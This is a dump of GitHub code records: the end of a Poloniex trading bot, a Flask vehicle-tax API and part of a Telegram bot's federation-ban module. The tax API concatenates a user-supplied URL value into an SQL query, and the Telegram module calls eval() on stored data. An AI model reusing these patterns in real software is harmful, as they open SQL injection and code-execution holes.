BidsSum012\")\n\t\t\t\t\t\t\t\t\tOrderBidsPrice3 = polo.returnOrderBook()[pair]['bids'][3][0] # Collect 4th highest buyorder (3) price\n\t\t\t\t\t\t\t\t\tOrderBidsAmount3 = polo.returnOrderBook()[pair]['bids'][3][1] # Collect 4th highest buyorder (3) amount\n\t\t\t\t\t\t\t\t\tOrderBidsSum3 = float(OrderBidsAmount3) * float(OrderBidsPrice3) # Calculate 4th highest buyorder BTC Value\n\t\t\t\t\t\t\t\t\tOrderBidsSum0123 = float(OrderBidsSum012) + float(OrderBidsSum3) # Calculate 1st 2nd 3rd & 4th highest buyorders BTC Value\n\t\t\t\t\t\t\t\t\t# Sell to the highest 4 bids (buyorders 0,1,2&3)\n\t\t\t\t\t\t\t\t\tsell = polo.sell(pair, OrderBidsPrice3, AltSell) # Make the SellOrder\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in Fourth Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telse: # Sell to the highest 3 bids (BuyOrders 0,1&2)\n\t\t\t\t\t\t\t\t\tsell = polo.sell(pair, OrderBidsPrice2, AltSell) # Make the SellOrder\n\t\t\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in Third Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse: # Sell to the highest 2 bids (BuyOrders 0&1)\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tsell = polo.sell(pair, OrderBidsPrice1, AltSell) # Make the SellOrder\n\t\t\t\t\t\t\t\tprint(\"---!SELL Complete!--- fitted in Second Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tbreak # End SELL part (if float(AltWorth) >= float(budget):)\t\t\t\t\n\t\t\t\t\telse: # BUY!!! Compare BuyOrder with Available Asks (same Logic as SELL part where sell=buy & bid=ask)\n\t\t\t\t\t\t#print(\"**BUY** AltWorth LOWER budget\")\n\t\t\t\t\t\tOrderAsksPrice0 = polo.returnOrderBook()[pair]['asks'][0][0]\n\t\t\t\t\t\tOrderAsksAmount0 = polo.returnOrderBook()[pair]['asks'][0][1]\n\t\t\t\t\t\tOrderAsksSum0 = float(OrderAsksAmount0) * float(OrderAsksPrice0)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif float(AltBuyWorth) <= float(OrderAsksSum0): #Order the OrderBook0 \t\t\t\t\t\t\t\n\t\t\t\t\t\t\tbuy = polo.buy(pair, Ask, AltBuy)\n\t\t\t\t\t\t\tprint(\"---!Buy Complete!--- fitted in first Ask\")\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: #OrderBook0 to small Calculate for Order 0&1\n\t\t\t\t\t\t\tprint(\"Order is Bigger than AsksSum0\")\n\t\t\t\t\t\t\tOrderAsksPrice1 = polo.returnOrderBook()[pair]['asks'][1][0]\n\t\t\t\t\t\t\tOrderAsksAmount1 = polo.returnOrderBook()[pair]['asks'][1][1]\n\t\t\t\t\t\t\tOrderAsksSum1 = float(OrderAsksAmount1) * float(OrderAsksPrice1)\n\t\t\t\t\t\t\tOrderAsksSum01 = float(OrderAsksSum0) + float(OrderAsksSum1)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif float(AltBuyWorth) >= float(OrderAsksSum01): #Orderbook 0&1 to small. Order 0,1&2\n\t\t\t\t\t\t\t\tprint(\"Order is Bigger than AsksSum01\")\n\t\t\t\t\t\t\t\tOrderAsksPrice2 = polo.returnOrderBook()[pair]['asks'][2][0]\n\t\t\t\t\t\t\t\tOrderAsksAmount2 = polo.returnOrderBook()[pair]['asks'][2][1]\n\t\t\t\t\t\t\t\tOrderAsksSum2 = float(OrderAsksAmount2) * float(OrderAsksPrice2)\n\t\t\t\t\t\t\t\tOrderAsksSum012 = float(OrderAsksSum01) + float(OrderAsksSum2)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif float(AltBuyWorth) >= float(OrderAsksSum012): #Orderbook 01&2 to small. Order 0,1,2&3\n\t\t\t\t\t\t\t\t\tprint(\"Order is Bigger than AsksSum012\")\n\t\t\t\t\t\t\t\t\tOrderAsksPrice3 = polo.returnOrderBook()[pair]['asks'][3][0]\n\t\t\t\t\t\t\t\t\tOrderAsksAmount3 = polo.returnOrderBook()[pair]['asks'][3][1]\n\t\t\t\t\t\t\t\t\tOrderAsksSum3 = float(OrderAsksAmount3) * float(OrderAsksPrice3)\n\t\t\t\t\t\t\t\t\tOrderAsksSum0123 = float(OrderAsksSum012) + float(OrderAsksSum3)\n\t\t\t\t\t\t\t\t\tbuy = polo.buy(pair, OrderAsksPrice3, AltBuy)\n\t\t\t\t\t\t\t\t\tprint(\"---!BUY Complete!--- fitted in Fourth Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telse: #Order the Orderbook 01&2\n\t\t\t\t\t\t\t\t\tbuy = polo.buy(pair, OrderAsksPrice2, AltBuy)\n\t\t\t\t\t\t\t\t\tprint(\"---!BUY Complete!--- fitted in Third Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse: #Order the Orderbook 0&1\n\t\t\t\t\t\t\t\tbuy = polo.buy(pair, OrderAsksPrice1, AltBuy)\n\t\t\t\t\t\t\t\tprint(\"---!BUY Complete!--- fitted in Second Bid\")\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tbreak # end BUY part\t\t\t\t\t\t\n\t\t\t\tbreak # end of try\n\t\t\texcept:\n\t\t\t\tbackoff(\"Can not finish the OrderBook\")\n\t\t\t\texit(1)\t\t\t\n\t\t\n\t\tprint(\" \")\n\t\tcounter = counter + 1\n","repo_name":"malikhodaei/PoloniexTradeBot","sub_path":"AllCoinsInBTC.py","file_name":"AllCoinsInBTC.py","file_ext":"py","file_size_in_byte":12188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"42"} +{"seq_id":"73295762686","text":"from flask import Flask, jsonify\nimport sqlite3\nfrom datetime import date, timedelta\nfrom bikram import samwat\n\napp = Flask(__name__)\n\n@app.route('////', methods = ['GET'])\n\ndef get(vehicle_registration_type, vehicle, cubic_centimeter_capacity, valid_upto):\n\tx = calculate(vehicle_registration_type, vehicle, cubic_centimeter_capacity, valid_upto)\n\n\treturn jsonify({\"Amount Due\" : x[0], 'Valid Upto' : x[1]}), 200\n\ndef calculate(vehicle_registration_type, vehicle, cubic_centimeter_capacity, valid_upto):\n\t\n\tdates = list((valid_upto.split('-')))\n\n\tsmall_vehicle = ['CAR', 'JEEP', 'VAN', 'MICRO-BUS']\n\tpower_vehicle = ['DOZER', 'EXCAVATOR', 'LOADER', 'ROLLER', 'TIPPER', 'CRANE', 'MINI-TIPPER', 'TRACTOR', 'POWER-TILLER', 'MINI-TRUCK', 'MINI-BUS', 'BUS', 'TRUCK']\n\tvehicle = vehicle.upper()\n\ttax = int()\n\n\tif(int(dates[2]) == 2076):\n\t\tyear = '_' + '2075'\n\n\telse:\n\t\tyear = '_' + dates[2]\t\t\n\n\tif vehicle_registration_type == 'private':\n\t\tdatabase_link = sqlite3.connect('private.db')\n\t\t\t\n\telif vehicle_registration_type == 'public':\n\t\tdatabase_link = sqlite3.connect('public.db')\n\t\t\t\n\tif vehicle == 'MOTORCYCLE':\n\t\tcursor = database_link.execute('SELECT CC_BEG, CC_END, ' + year + ' FROM MOTORCYCLE')\n\t\t\t\n\t\tfor row in cursor:\n\t\t\tif cubic_centimeter_capacity >= row[0] and cubic_centimeter_capacity <= row[1]:\n\t\t\t\ttax = row[2]\n\t\t\t\n\telif vehicle in small_vehicle:\n\t\tcursor = database_link.execute('SELECT CC_BEG, CC_END, ' + year + ' FROM SMALL_VEH')\n\t\t\t\t\t\n\t\tfor row in cursor:\n\t\t\tif(row[0] <= cubic_centimeter_capacity and row[1] >= cubic_centimeter_capacity):\n\t\t\t\ttax = row[2]\t\t\n\t\t\t\n\telif vehicle in power_vehicle:\n\t\tcursor = database_link.execute('SELECT TYPE, ' + year + ' FROM POWER_VEH')\n\t\t\t\n\t\tfor row in cursor:\n\t\t\tif row[0] == vehicle:\n\t\t\t\ttax = row[1]\n\n\ttemp = valid_upto\n\tvalid_upto = samwat(int(dates[2]), int(dates[1]), int(dates[0]))\n\tcurrent_date = samwat.from_ad(date.today())\n\n\tvalidity = valid_upto + timedelta(days = 365)\n\tvalidity = validity.as_tuple()\n\tvalidity = str(validity[2]) + '-' + str(validity[1]) + '-' + str(validity[0])\n\n\tnumber_of_days_left = current_date - valid_upto\n\tnumber_of_days_left = number_of_days_left.days\n\n\tif number_of_days_left <= 0:\n\t\treturn 0, temp\n\n\tpenalty_free_date = valid_upto.as_tuple()\n\n\tif(penalty_free_date[1] + 3 > 12):\n\t\tpenalty_free_date = samwat(penalty_free_date[0]+1, 1, 1)\n\t\tpenalty_free_date = penalty_free_date - timedelta(days = 1)\n\n\telse:\n\t\tpenalty_free_date = samwat(penalty_free_date[0], penalty_free_date[1] + 3, penalty_free_date[2])\n\n\tif(penalty_free_date >= current_date):\n\t\treturn tax, validity\n\n\tdays_exceeded = current_date - penalty_free_date;\n\tdays_exceeded = days_exceeded.days\n\n\tif days_exceeded <= 30:\n\t\ttax = tax + (0.05 * tax)\n\n\telif days_exceeded <= 45:\n\t\ttax = tax + (0.1 * tax)\n\n\telse:\n\t\tcurrent_date = current_date.as_tuple()\n\n\t\tif current_date[0] == int(dates[2]):\n\t\t\ttax = tax + (0.2 * tax)\n\n\t\telse:\n\t\t\ttax = tax + (0.32 * tax)\n\n\treturn tax, validity\n","repo_name":"akshat00/VEHICLE-TAX-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"14382683114","text":"import html\nfrom io import BytesIO\nfrom typing import Optional, List\nimport random\nimport uuid\nimport re\nimport json\nimport time\nfrom time import sleep\n\nfrom future.utils import string_types\nfrom telegram.error import BadRequest, TelegramError, Unauthorized\nfrom telegram import ParseMode, Update, Bot, Chat, User, MessageEntity, InlineKeyboardMarkup, InlineKeyboardButton\nfrom telegram.ext import run_async, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom telegram.utils.helpers import escape_markdown, mention_html, mention_markdown\n\nfrom haruka import dispatcher, OWNER_ID, SUDO_USERS, WHITELIST_USERS, MESSAGE_DUMP, LOGGER\nfrom haruka.modules.helper_funcs.handlers import CMD_STARTERS\nfrom haruka.modules.helper_funcs.misc import is_module_loaded, send_to_list\nfrom haruka.modules.helper_funcs.chat_status import is_user_admin\nfrom haruka.modules.helper_funcs.extraction import extract_user, extract_user_and_text\nfrom haruka.modules.helper_funcs.string_handling import markdown_parser\nfrom haruka.modules.disable import DisableAbleCommandHandler\n\nimport haruka.modules.sql.feds_sql as sql\n\n# Hello bot owner, I spended for feds many hours of my life, Please don't remove this if you still respect MrYacha and peaktogoo and AyraHikari too\n# Federation by MrYacha 2018-2019\n# Federation rework by Mizukito Akito 2019\n# Federation update v2 by Ayra Hikari 2019\n#\n# Time spended on feds = 10h by #MrYacha\n# Time spended on reworking on the whole feds = 22+ hours by @RealAkito\n# Time spended on updating version to v2 = 26+ hours by @AyraHikari\n#\n# Total spended for making this features is 68+ hours\n\nLOGGER.info(\"Original federation module by MrYacha, reworked by Mizukito Akito (@RealAkito) on Telegram.\")\n\n\nFBAN_ERRORS = {\n\t\"User is an administrator of the chat\",\n\t\"Chat not found\",\n\t\"Not enough rights to restrict/unrestrict chat member\",\n\t\"User_not_participant\",\n\t\"Peer_id_invalid\",\n\t\"Group chat was deactivated\",\n\t\"Need to be inviter of a user to kick it from a basic group\",\n\t\"Chat_admin_required\",\n\t\"Only the creator of a basic group can kick group administrators\",\n\t\"Channel_private\",\n\t\"Not in the chat\",\n\t\"Have no rights to send a message\"\n}\n\nUNFBAN_ERRORS = {\n\t\"User is an administrator of the chat\",\n\t\"Chat not found\",\n\t\"Not enough rights to restrict/unrestrict chat member\",\n\t\"User_not_participant\",\n\t\"Method is available for supergroup and channel chats only\",\n\t\"Not in the chat\",\n\t\"Channel_private\",\n\t\"Chat_admin_required\",\n\t\"Have no rights to send a message\"\n}\n\n@run_async\ndef new_fed(bot: Bot, update: Update):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmessage = update.effective_message\n\tif chat.type != \"private\":\n\t\tupdate.effective_message.reply_text(\"Do it in PM?\")\n\t\treturn\n\tfednam = message.text.split(None, 1)[1]\n\tif not fednam == '':\n\t\tfed_id = str(uuid.uuid4())\n\t\tfed_name = fednam\n\t\tLOGGER.info(fed_id)\n\t\tif user.id == int(OWNER_ID):\n\t\t\tfed_id = fed_name\n\n\t\tx = sql.new_fed(user.id, fed_name, fed_id)\n\t\tif not x:\n\t\t\tupdate.effective_message.reply_text(\"Federation creation failed! Keep in the mind that this rarely happened! Ask in @HarukaAyaGroup for help!\")\n\t\t\treturn\n\n\t\tupdate.effective_message.reply_text(\"*You have successfully created a new federation!*\"\\\n\t\t\t\t\t\t\t\t\t\t\t\"\\nName: `{}`\"\\\n\t\t\t\t\t\t\t\t\t\t\t\"\\nID: `{}`\"\n\t\t\t\t\t\t\t\t\t\t\t\"\\n\\nUse the command below to join the federation:\"\n\t\t\t\t\t\t\t\t\t\t\t\"\\n`/joinfed {}`\".format(fed_name, fed_id, fed_id), parse_mode=ParseMode.MARKDOWN)\n\t\ttry:\n\t\t\tbot.send_message(MESSAGE_DUMP,\n\t\t\t\t\"Federation {} have been created with ID:
{}
\".format(fed_name, fed_id), parse_mode=ParseMode.HTML)\n\t\texcept:\n\t\t\tLOGGER.warning(\"Cannot send a message to MESSAGE_DUMP\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Please write down the name of the federation\")\n\n@run_async\ndef del_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tif chat.type != \"private\":\n\t\tupdate.effective_message.reply_text(\"You can only delete federation in PM!\")\n\t\treturn\n\tif args:\n\t\tis_fed_id = args[0]\n\t\tgetinfo = sql.get_fed_info(is_fed_id)\n\t\tif getinfo == False:\n\t\t\tupdate.effective_message.reply_text(\"This federation is not found\")\n\t\t\treturn\n\t\tif int(getinfo['owner']) == int(user.id):\n\t\t\tfed_id = is_fed_id\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\t\t\treturn\n\telse:\n\t\tupdate.effective_message.reply_text(\"What should I delete?\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\t\treturn\n\n\tupdate.effective_message.reply_text(\"Are you sure you want to delete your federation? This action cannot be canceled, you will lose your entire ban list, and '{}' will be permanently lost.\".format(getinfo['fname']),\n\t\t\treply_markup=InlineKeyboardMarkup(\n\t\t\t\t\t\t[[InlineKeyboardButton(text=\"⚠️ Remove Federation ⚠️\", callback_data=\"rmfed_{}\".format(fed_id))],\n\t\t\t\t\t\t[InlineKeyboardButton(text=\"Cancel\", callback_data=\"rmfed_cancel\")]]))\n\n@run_async\ndef fed_chat(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tuser_id = update.effective_message.from_user.id\n\tif not is_user_admin(update.effective_chat, user_id):\n\t\tupdate.effective_message.reply_text(\"You must be an admin to execute this command\")\n\t\treturn\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not in any federation!\")\n\t\treturn\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tinfo = sql.get_fed_info(fed_id)\n\n\ttext = \"This chat is part of the following federation:\"\n\ttext += \"\\n{} (ID: {})\".format(info['fname'], fed_id)\n\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\ndef join_fed(bot: Bot, update: Update, args: List[str]):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n message = update.effective_message\n administrators = chat.get_administrators()\n fed_id = sql.get_fed_id(chat.id)\n\n if user.id in SUDO_USERS:\n pass\n else:\n for admin in administrators:\n status = admin.status\n if status == \"creator\":\n print(admin)\n if str(admin.user.id) == str(user.id):\n pass\n else:\n update.effective_message.reply_text(\"Only group creator can do it!\")\n return\n if fed_id:\n message.reply_text(\"Uh, Are you gonna join two federations at one chat?\")\n return\n\n if len(args) >= 1:\n fedd = args[0]\n print(fedd)\n if sql.search_fed_by_id(fedd) == False:\n message.reply_text(\"Please enter valid federation id.\")\n return\n\n x = sql.chat_join_fed(fedd, chat.id)\n if not x:\n message.reply_text(\"Failed to join to federation! Due to some errors that basically I have no idea, try reporting it in support group!\")\n return\n\n message.reply_text(\"Chat joined to federation!\")\n\n\n@run_async\ndef leave_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\tfed_info = sql.get_fed_info(fed_id)\n\n\t# administrators = chat.get_administrators().status\n\tgetuser = bot.get_chat_member(chat.id, user.id).status\n\tif getuser in 'creator' or user.id in SUDO_USERS:\n\t\tif sql.chat_leave_fed(chat.id) == True:\n\t\t\tupdate.effective_message.reply_text(\"This chat has left the federation: {}!\".format(fed_info['fname']))\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"How can you leave a federation that you never joined?!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Only group creators can use this command!\")\n\n@run_async\ndef user_join_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmsg = update.effective_message # type: Optional[Message]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif is_user_fed_owner(fed_id, user.id):\n\t\tuser_id = extract_user(msg, args)\n\t\tif user_id:\n\t\t\tuser = bot.get_chat(user_id)\n\t\telif not msg.reply_to_message and not args:\n\t\t\tuser = msg.from_user\n\t\telif not msg.reply_to_message and (not args or (\n\t\t\tlen(args) >= 1 and not args[0].startswith(\"@\") and not args[0].isdigit() and not msg.parse_entities(\n\t\t\t[MessageEntity.TEXT_MENTION]))):\n\t\t\tmsg.reply_text(\"I cannot extract users from this message\")\n\t\t\treturn\n\t\telse:\n\t\t\tLOGGER.warning('error')\n\t\tgetuser = sql.search_user_in_fed(fed_id, user_id)\n\t\tfed_id = sql.get_fed_id(chat.id)\n\t\tinfo = sql.get_fed_info(fed_id)\n\t\tget_owner = eval(info['fusers'])['owner']\n\t\tget_owner = bot.get_chat(get_owner).id\n\t\tif user_id == get_owner:\n\t\t\tupdate.effective_message.reply_text(\"Why are you trying to promote a federation owner?\")\n\t\t\treturn\n\t\tif getuser:\n\t\t\tupdate.effective_message.reply_text(\"I cannot promote users who are already federation admins! But I can remove them if you want!\")\n\t\t\treturn\n\t\tif user_id == bot.id:\n\t\t\tupdate.effective_message.reply_text(\"I already am a federation admin in all federations!\")\n\t\t\treturn\n\t\tres = sql.user_join_fed(fed_id, user_id)\n\t\tif res:\n\t\t\tupdate.effective_message.reply_text(\"Successfully Promoted!\")\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"Failed to promote!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\n\n@run_async\ndef user_demote_fed(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif is_user_fed_owner(fed_id, user.id):\n\t\tmsg = update.effective_message # type: Optional[Message]\n\t\tuser_id = extract_user(msg, args)\n\t\tif user_id:\n\t\t\tuser = bot.get_chat(user_id)\n\n\t\telif not msg.reply_to_message and not args:\n\t\t\tuser = msg.from_user\n\n\t\telif not msg.reply_to_message and (not args or (\n\t\t\tlen(args) >= 1 and not args[0].startswith(\"@\") and not args[0].isdigit() and not msg.parse_entities(\n\t\t\t[MessageEntity.TEXT_MENTION]))):\n\t\t\tmsg.reply_text(\"I cannot extract users from this message\")\n\t\t\treturn\n\t\telse:\n\t\t\tLOGGER.warning('error')\n\n\t\tif user_id == bot.id:\n\t\t\tupdate.effective_message.reply_text(\"Are you trying to demote me as a federation admin? Do you think I am stupid?\")\n\t\t\treturn\n\n\t\tif sql.search_user_in_fed(fed_id, user_id) == False:\n\t\t\tupdate.effective_message.reply_text(\"I cannot demote people who are not federation admins!\")\n\t\t\treturn\n\n\t\tres = sql.user_demote_fed(fed_id, user_id)\n\t\tif res == True:\n\t\t\tupdate.effective_message.reply_text(\"Get out of here!\")\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"Demotion failed!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Only federation owners can do this!\")\n\t\treturn\n\n@run_async\ndef fed_info(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not in any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only a federation admin can do this!\")\n\t\treturn\n\n\towner = bot.get_chat(info['owner'])\n\ttry:\n\t\towner_name = owner.first_name + \" \" + owner.last_name\n\texcept:\n\t\towner_name = owner.first_name\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\tFEDADMIN.append(int(owner.id))\n\tTotalAdminFed = len(FEDADMIN)\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tinfo = sql.get_fed_info(fed_id)\n\n\ttext = \"ℹ️ Federation Information:\"\n\ttext += \"\\nFedID: {}\".format(fed_id)\n\ttext += \"\\nName: {}\".format(info['fname'])\n\ttext += \"\\nCreator: {}\".format(mention_html(owner.id, owner_name))\n\ttext += \"\\nAll Admins: {}\".format(TotalAdminFed)\n\tgetfban = sql.get_all_fban_users(fed_id)\n\ttext += \"\\nTotal banned users: {}\".format(len(getfban))\n\tgetfchat = sql.all_fed_chats(fed_id)\n\ttext += \"\\nNumber of groups in this federation: {}\".format(len(getfchat))\n\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n@run_async\ndef fed_admin(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not in any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tinfo = sql.get_fed_info(fed_id)\n\n\ttext = \"Federation Admin {}:\\n\\n\".format(info['fname'])\n\ttext += \"👑 Owner:\\n\"\n\towner = bot.get_chat(info['owner'])\n\ttry:\n\t\towner_name = owner.first_name + \" \" + owner.last_name\n\texcept:\n\t\towner_name = owner.first_name\n\ttext += \" • {}\\n\".format(mention_html(owner.id, owner_name))\n\n\tmembers = sql.all_fed_members(fed_id)\n\tif len(members) == 0:\n\t\ttext += \"\\n🔱 There is no admin in this federation\"\n\telse:\n\t\ttext += \"\\n🔱 Admin:\\n\"\n\t\tfor x in members:\n\t\t\tuser = bot.get_chat(x) \n\t\t\ttext += \" • {}\\n\".format(mention_html(user.id, user.first_name))\n\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef fed_ban(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tinfo = sql.get_fed_info(fed_id)\n\tOW = bot.get_chat(info['owner'])\n\tHAHA = OW.id\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\tFEDADMIN.append(int(HAHA))\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tmessage = update.effective_message # type: Optional[Message]\n\n\tuser_id, reason = extract_user_and_text(message, args)\n\n\tfban, fbanreason = sql.get_fban_user(fed_id, user_id)\n\n\tif not user_id:\n\t\tmessage.reply_text(\"You don't seem to be referring to a user\")\n\t\treturn\n\n\tif user_id == bot.id:\n\t\tmessage.reply_text(\"What is funnier than kicking the group creator? Self sacrifice.\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user_id) == True:\n\t\tmessage.reply_text(\"Why did you try the federation fban?\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user_id) == True:\n\t\tmessage.reply_text(\"He is a federation admin, I can't fban him.\")\n\t\treturn\n\n\tif user_id == OWNER_ID:\n\t\tmessage.reply_text(\"I don't want to block my master, that's a very stupid idea!\")\n\t\treturn\n\n\tif int(user_id) in SUDO_USERS:\n\t\tmessage.reply_text(\"I will not use sudo fban!\")\n\t\treturn\n\n\tif int(user_id) in WHITELIST_USERS:\n\t\tmessage.reply_text(\"This person is whitelisted, so they can't be fban!\")\n\t\treturn\n\n\ttry:\n\t\tuser_chat = bot.get_chat(user_id)\n\texcept BadRequest as excp:\n\t\tmessage.reply_text(excp.message)\n\t\treturn\n\n\tif user_chat.type != 'private':\n\t\tmessage.reply_text(\"That's not a user!\")\n\t\treturn\n\n\tif fban:\n\t\tuser_target = mention_html(user_chat.id, user_chat.first_name)\n\t\tfed_name = info['fname']\n\t\tstarting = \"The reason fban is replaced for {} in the Federation {}.\".format(user_target, fed_name)\n\t\tupdate.effective_message.reply_text(starting, parse_mode=ParseMode.HTML)\n\n\t\tif reason == \"\":\n\t\t\treason = \"No reason given.\"\n\n\t\ttemp = sql.un_fban_user(fed_id, user_id)\n\t\tif not temp:\n\t\t\tmessage.reply_text(\"Failed to update the reason for fedban!\")\n\t\t\treturn\n\t\tx = sql.fban_user(fed_id, user_id, user_chat.first_name, user_chat.last_name, user_chat.username, reason)\n\t\tif not x:\n\t\t\tmessage.reply_text(\"Failed to ban from the federation! If this problem continues, contact @onepunchsupport.\")\n\t\t\treturn\n\n\t\tfed_chats = sql.all_fed_chats(fed_id)\n\t\tfor chat in fed_chats:\n\t\t\ttry:\n\t\t\t\tbot.kick_chat_member(chat, user_id)\n\t\t\texcept BadRequest as excp:\n\t\t\t\tif excp.message in FBAN_ERRORS:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tLOGGER.warning(\"Could not fban on {} because: {}\".format(chat, excp.message))\n\t\t\texcept TelegramError:\n\t\t\t\tpass\n\n\t\tsend_to_list(bot, FEDADMIN,\n\t\t\t\t \"FedBan reason updated\" \\\n\t\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t\t \"\\nUser ID: {}\" \\\n\t\t\t\t\t\t\t \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_chat.id, reason), \n\t\t\t\thtml=True)\n\t\tmessage.reply_text(\"FedBan reason has been updated.\")\n\t\treturn\n\n\tuser_target = mention_html(user_chat.id, user_chat.first_name)\n\tfed_name = info['fname']\n\n\tstarting = \"Starting a federation ban for {} in the Federation {}.\".format(user_target, fed_name)\n\tupdate.effective_message.reply_text(starting, parse_mode=ParseMode.HTML)\n\n\tif reason == \"\":\n\t\treason = \"No reason given.\"\n\n\tx = sql.fban_user(fed_id, user_id, user_chat.first_name, user_chat.last_name, user_chat.username, reason)\n\tif not x:\n\t\tmessage.reply_text(\"Failed to ban from the federation! If this problem continues, contact @onepunchsupport.\")\n\t\treturn\n\n\tfed_chats = sql.all_fed_chats(fed_id)\n\tfor chat in fed_chats:\n\t\ttry:\n\t\t\tbot.kick_chat_member(chat, user_id)\n\t\texcept BadRequest as excp:\n\t\t\tif excp.message in FBAN_ERRORS:\n\t\t\t\ttry:\n\t\t\t\t\tdispatcher.bot.getChat(chat)\n\t\t\t\texcept Unauthorized:\n\t\t\t\t\tsql.chat_leave_fed(chat)\n\t\t\t\t\tLOGGER.info(\"Chat {} has leave fed {} because bot is kicked\".format(chat, 